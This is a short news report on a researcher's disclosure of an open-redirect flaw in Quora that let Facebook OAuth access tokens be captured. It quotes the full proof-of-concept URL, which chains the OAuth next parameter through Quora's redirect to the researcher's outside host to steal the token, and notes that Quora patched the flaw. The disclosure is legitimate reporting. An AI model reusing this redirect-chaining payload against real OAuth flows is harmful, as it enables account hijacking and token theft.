An Indian Security researcher Prakhar Prasad has found a way to hack the facebook accounts by exploiting an open redirection flaw in Quora - one of the famous Question&Answer website.
Quora allows users to be signed up through facebook account. While signing up for the quora, researcher noticed quora.com was permitted to receive access token from facebook oAuth.
Prasad has managed to steal the access token from the quora website by exploiting an open-redirect security flaw in the quora.com
POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token
"Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token" researcher said in his blog.
In this case , the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora". So the request will redirect user to the above URL with access token which further redirects to the prasad's page(exploiting open-redirect flaw). The page created by prasad successfully captures the access token and direct users to the facebook.com
Unwitting users who follow the POC link soon find themself victim to the facebook account hack.
Complete technical details can be found in his personal blog.
You can also check out the video demo here:
Quora patched the security flaw few days after the Prasad reported the bug.
